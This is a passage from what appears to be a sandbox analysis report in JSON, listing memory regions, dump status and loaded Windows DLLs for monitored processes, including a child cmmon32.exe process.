"dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 53805056, "type": "region", "version": 1 }, "end_va": 53809151, "entry_point": 0, "filename": null, "id": "region_1212", "name": "pagefile_0x0000000003350000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 53805056, "timestamp": "00:01:06.778", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 53870592, "type": "region", "version": 1 }, "end_va": 53874687, "entry_point": 0, "filename": null, "id": "region_1213", "name": "pagefile_0x0000000003360000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 53870592, "timestamp": "00:01:06.778", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 53936128, "type": "region", "version": 1 }, "end_va": 54198271, "entry_point": 0, "filename": null, "id": "region_1214", "name": "private_0x0000000003370000", "norm_filename": null, "region_type": "private_memory", "start_va": 53936128, "timestamp": "00:01:06.778", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 327680, "start_va": 54198272, "type": "region", 
"version": 1 }, "end_va": 54525951, "entry_point": 0, "filename": null, "id": "region_1215", "name": "private_0x00000000033b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 54198272, "timestamp": "00:01:06.779", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 294912, "start_va": 54525952, "type": "region", "version": 1 }, "end_va": 54820863, "entry_point": 0, "filename": null, "id": "region_1216", "name": "private_0x0000000003400000", "norm_filename": null, "region_type": "private_memory", "start_va": 54525952, "timestamp": "00:01:06.780", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001217-addr_0x0000000003450000-size_0x0000000000003000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_209", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 12288, "start_va": 54853632, "type": "region", "version": 1 }, "end_va": 54865919, "entry_point": 0, "filename": null, "id": "region_1217", "name": "private_0x0000000003450000", "norm_filename": null, "region_type": "private_memory", "start_va": 54853632, "timestamp": "00:01:06.784", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 54919168, "type": "region", "version": 1 }, "end_va": 55181311, "entry_point": 0, "filename": null, "id": "region_1218", "name": "private_0x0000000003460000", "norm_filename": null, "region_type": "private_memory", 
"start_va": 54919168, "timestamp": "00:01:06.784", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 55181312, "type": "region", "version": 1 }, "end_va": 55443455, "entry_point": 0, "filename": null, "id": "region_1219", "name": "private_0x00000000034a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 55181312, "timestamp": "00:01:06.785", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 55443456, "type": "region", "version": 1 }, "end_va": 55447551, "entry_point": 0, "filename": null, "id": "region_1220", "name": "pagefile_0x00000000034e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 55443456, "timestamp": "00:01:06.785", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 55508992, "type": "region", "version": 1 }, "end_va": 55771135, "entry_point": 0, "filename": null, "id": "region_1221", "name": "private_0x00000000034f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 55508992, "timestamp": "00:01:06.785", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, 
"size": 8192, "start_va": 55771136, "type": "region", "version": 1 }, "end_va": 55779327, "entry_point": 0, "filename": null, "id": "region_1222", "name": "pagefile_0x0000000003530000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 55771136, "timestamp": "00:01:06.785", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 55836672, "type": "region", "version": 1 }, "end_va": 56098815, "entry_point": 0, "filename": null, "id": "region_1223", "name": "private_0x0000000003540000", "norm_filename": null, "region_type": "private_memory", "start_va": 55836672, "timestamp": "00:01:06.786", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 56098816, "type": "region", "version": 1 }, "end_va": 56107007, "entry_point": 0, "filename": null, "id": "region_1224", "name": "pagefile_0x0000000003580000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 56098816, "timestamp": "00:01:06.786", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 56164352, "type": "region", "version": 1 }, "end_va": 56168447, "entry_point": 56164352, "filename": "\\Windows\\System32\\oleaccrc.dll", "id": "region_1225", "name": "oleaccrc.dll", "norm_filename": "c:\\windows\\system32\\oleaccrc.dll", "region_type": "memory_mapped_file", "start_va": 56164352, "timestamp": "00:01:06.786", "type": 
"region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 56229888, "type": "region", "version": 1 }, "end_va": 56238079, "entry_point": 0, "filename": null, "id": "region_1226", "name": "pagefile_0x00000000035a0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 56229888, "timestamp": "00:01:06.786", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 28672, "start_va": 56295424, "type": "region", "version": 1 }, "end_va": 56324095, "entry_point": 56295424, "filename": "\\Windows\\System32\\en-US\\bthprops.cpl.mui", "id": "region_1227", "name": "bthprops.cpl.mui", "norm_filename": "c:\\windows\\system32\\en-us\\bthprops.cpl.mui", "region_type": "memory_mapped_file", "start_va": 56295424, "timestamp": "00:01:06.786", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 56360960, "type": "region", "version": 1 }, "end_va": 56623103, "entry_point": 0, "filename": null, "id": "region_1228", "name": "private_0x00000000035c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 56360960, "timestamp": "00:01:06.786", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, 
"start_va": 56623104, "type": "region", "version": 1 }, "end_va": 56631295, "entry_point": 0, "filename": null, "id": "region_1229", "name": "pagefile_0x0000000003600000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 56623104, "timestamp": "00:01:06.786", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 56688640, "type": "region", "version": 1 }, "end_va": 56696831, "entry_point": 0, "filename": null, "id": "region_1230", "name": "pagefile_0x0000000003610000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 56688640, "timestamp": "00:01:06.786", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 16384, "start_va": 56754176, "type": "region", "version": 1 }, "end_va": 56770559, "entry_point": 56754176, "filename": "\\Windows\\System32\\en-US\\prnfldr.dll.mui", "id": "region_1231", "name": "prnfldr.dll.mui", "norm_filename": "c:\\windows\\system32\\en-us\\prnfldr.dll.mui", "region_type": "memory_mapped_file", "start_va": 56754176, "timestamp": "00:01:06.786", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001232-addr_0x0000000003630000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_210", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 56819712, "type": "region", "version": 1 }, "end_va": 57081855, "entry_point": 0, "filename": null, "id": "region_1232", "name": 
"private_0x0000000003630000", "norm_filename": null, "region_type": "private_memory", "start_va": 56819712, "timestamp": "00:01:06.786", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 69632, "start_va": 57081856, "type": "region", "version": 1 }, "end_va": 57151487, "entry_point": 57081856, "filename": "\\Windows\\System32\\en-US\\netshell.dll.mui", "id": "region_1233", "name": "netshell.dll.mui", "norm_filename": "c:\\windows\\system32\\en-us\\netshell.dll.mui", "region_type": "memory_mapped_file", "start_va": 57081856, "timestamp": "00:01:06.786", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 57212928, "type": "region", "version": 1 }, "end_va": 57475071, "entry_point": 0, "filename": null, "id": "region_1234", "name": "private_0x0000000003690000", "norm_filename": null, "region_type": "private_memory", "start_va": 57212928, "timestamp": "00:01:06.787", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001235-addr_0x00000000036d0000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_211", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 57475072, "type": "region", "version": 1 }, "end_va": 57737215, "entry_point": 0, "filename": null, "id": "region_1235", "name": "private_0x00000000036d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 57475072, "timestamp": "00:01:06.787", "type": "region", 
"version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 57737216, "type": "region", "version": 1 }, "end_va": 58785791, "entry_point": 57737216, "filename": "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_32.db", "id": "region_1236", "name": "thumbcache_32.db", "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_32.db", "region_type": "memory_mapped_file", "start_va": 57737216, "timestamp": "00:01:06.787", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 58785792, "type": "region", "version": 1 }, "end_va": 59834367, "entry_point": 58785792, "filename": "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_96.db", "id": "region_1237", "name": "thumbcache_96.db", "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_96.db", "region_type": "memory_mapped_file", "start_va": 58785792, "timestamp": "00:01:06.787", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 59834368, "type": "region", "version": 1 }, "end_va": 60882943, "entry_point": 59834368, "filename": "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db", "id": "region_1238", "name": "thumbcache_256.db", "norm_filename": "c:\\users\\bgc6u8oy 
yxgxkr\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_256.db", "region_type": "memory_mapped_file", "start_va": 59834368, "timestamp": "00:01:06.787", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001264-addr_0x0000000005a00000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_212", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 94371840, "type": "region", "version": 1 }, "end_va": 94633983, "entry_point": 0, "filename": null, "id": "region_1264", "name": "private_0x0000000005a00000", "norm_filename": null, "region_type": "private_memory", "start_va": 94371840, "timestamp": "00:01:06.796", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001267-addr_0x0000000005b40000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_213", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 95682560, "type": "region", "version": 1 }, "end_va": 95944703, "entry_point": 0, "filename": null, "id": "region_1267", "name": "private_0x0000000005b40000", "norm_filename": null, "region_type": "private_memory", "start_va": 95682560, "timestamp": "00:01:06.797", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001432-addr_0x000000007ffa1000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_214", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147094528, "type": "region", "version": 1 }, "end_va": 2147098623, 
"entry_point": 0, "filename": null, "id": "region_1432", "name": "private_0x000000007ffa1000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147094528, "timestamp": "00:01:07.247", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001437-addr_0x000000007ffa6000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_215", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147115008, "type": "region", "version": 1 }, "end_va": 2147119103, "entry_point": 0, "filename": null, "id": "region_1437", "name": "private_0x000000007ffa6000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147115008, "timestamp": "00:01:07.248", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001438-addr_0x000000007ffa7000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_216", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147119104, "type": "region", "version": 1 }, "end_va": 2147123199, "entry_point": 0, "filename": null, "id": "region_1438", "name": "private_0x000000007ffa7000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147119104, "timestamp": "00:01:07.249", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001448-addr_0x000000007ffd3000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_217", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147299328, "type": 
"region", "version": 1 }, "end_va": 2147303423, "entry_point": 0, "filename": null, "id": "region_1448", "name": "private_0x000000007ffd3000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147299328, "timestamp": "00:01:07.251", "type": "region", "version": 1 } ], "terminate_reason": "timeout", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "\"C:\\Windows\\System32\\cmmon32.exe\"", "filename": "c:\\windows\\system32\\cmmon32.exe", "id": "proc_8", "image_name": "cmmon32.exe", "monitor_reason": "child_process", "monitored_id": 8, "origin_monitor_id": 7, "ref_parent_process": { "ref_id": "proc_7", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "process_00000008-region_00001464-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_219", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_1464", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:01:10.513", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 212991, "entry_point": 0, "filename": null, "id": "region_1465", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:01:10.513", "type": "region", 
"version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 0, "filename": null, "id": "region_1466", "name": "pagefile_0x0000000000040000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 262144, "timestamp": "00:01:10.513", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 172032, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 499711, "entry_point": 0, "filename": null, "id": "region_1467", "name": "pagefile_0x0000000000050000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 327680, "timestamp": "00:01:10.513", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 2162688, "type": "region", "version": 1 }, "end_va": 2424831, "entry_point": 0, "filename": null, "id": "region_1468", "name": "private_0x0000000000210000", "norm_filename": null, "region_type": "private_memory", "start_va": 2162688, "timestamp": "00:01:10.514", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 53248, "start_va": 
15663104, "type": "region", "version": 1 }, "end_va": 15716351, "entry_point": 0, "filename": null, "id": "region_1469", "name": "pagefile_0x0000000000ef0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 15663104, "timestamp": "00:01:10.514", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1294336, "start_va": 1995767808, "type": "region", "version": 1 }, "end_va": 1997062143, "entry_point": 1995767808, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_1470", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 1995767808, "timestamp": "00:01:10.514", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 1998127104, "type": "region", "version": 1 }, "end_va": 1998131199, "entry_point": 1998127104, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_1471", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 1998127104, "timestamp": "00:01:10.514", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2147155968, "type": "region", "version": 1 }, "end_va": 2147299327, "entry_point": 0, "filename": null, "id": "region_1472", "name": "pagefile_0x000000007ffb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", 
"start_va": 2147155968, "timestamp": "00:01:10.514", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2147328000, "type": "region", "version": 1 }, "end_va": 2147332095, "entry_point": 0, "filename": null, "id": "region_1473", "name": "private_0x000000007ffda000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147328000, "timestamp": "00:01:10.514", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2147348480, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_1474", "name": "private_0x000000007ffdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147348480, "timestamp": "00:01:10.515", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_1475", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:01:10.541", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], 
"ref_process_dump": null, "size": 1048576, "start_va": 720896, "type": "region", "version": 1 }, "end_va": 1769471, "entry_point": 0, "filename": null, "id": "region_1476", "name": "private_0x00000000000b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 720896, "timestamp": "00:01:10.542", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 2424832, "type": "region", "version": 1 }, "end_va": 2846719, "entry_point": 2424832, "filename": "\\Windows\\System32\\locale.nls", "id": "region_1477", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 2424832, "timestamp": "00:01:10.542", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 819200, "start_va": 2883584, "type": "region", "version": 1 }, "end_va": 3702783, "entry_point": 0, "filename": null, "id": "region_1478", "name": "pagefile_0x00000000002c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2883584, "timestamp": "00:01:10.542", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 57344, "start_va": 1864761344, "type": "region", "version": 1 }, "end_va": 1864818687, "entry_point": 1864761344, "filename": "\\Windows\\System32\\cmutil.dll", "id": "region_1479", "name": "cmutil.dll", "norm_filename": "c:\\windows\\system32\\cmutil.dll", "region_type": "memory_mapped_file", "start_va": 1864761344, 
"timestamp": "00:01:10.542", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 1952382976, "type": "region", "version": 1 }, "end_va": 1952419839, "entry_point": 1952382976, "filename": "\\Windows\\System32\\version.dll", "id": "region_1480", "name": "version.dll", "norm_filename": "c:\\windows\\system32\\version.dll", "region_type": "memory_mapped_file", "start_va": 1952382976, "timestamp": "00:01:10.544", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 303104, "start_va": 1965424640, "type": "region", "version": 1 }, "end_va": 1965727743, "entry_point": 1965424640, "filename": "\\Windows\\System32\\KernelBase.dll", "id": "region_1481", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\system32\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1965424640, "timestamp": "00:01:10.544", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 659456, "start_va": 1967259648, "type": "region", "version": 1 }, "end_va": 1967919103, "entry_point": 1967259648, "filename": "\\Windows\\System32\\rpcrt4.dll", "id": "region_1482", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\system32\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1967259648, "timestamp": "00:01:10.544", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ 
"readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1967980544, "type": "region", "version": 1 }, "end_va": 1968635903, "entry_point": 1967980544, "filename": "\\Windows\\System32\\advapi32.dll", "id": "region_1483", "name": "advapi32.dll", "norm_filename": "c:\\windows\\system32\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1967980544, "timestamp": "00:01:10.544", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1984299008, "type": "region", "version": 1 }, "end_va": 1984339967, "entry_point": 1984299008, "filename": "\\Windows\\System32\\lpk.dll", "id": "region_1484", "name": "lpk.dll", "norm_filename": "c:\\windows\\system32\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1984299008, "timestamp": "00:01:10.544", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 319488, "start_va": 1985806336, "type": "region", "version": 1 }, "end_va": 1986125823, "entry_point": 1985806336, "filename": "\\Windows\\System32\\gdi32.dll", "id": "region_1485", "name": "gdi32.dll", "norm_filename": "c:\\windows\\system32\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 1985806336, "timestamp": "00:01:10.544", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 823296, "start_va": 1986134016, "type": "region", "version": 1 }, "end_va": 1986957311, "entry_point": 1986134016, "filename": 
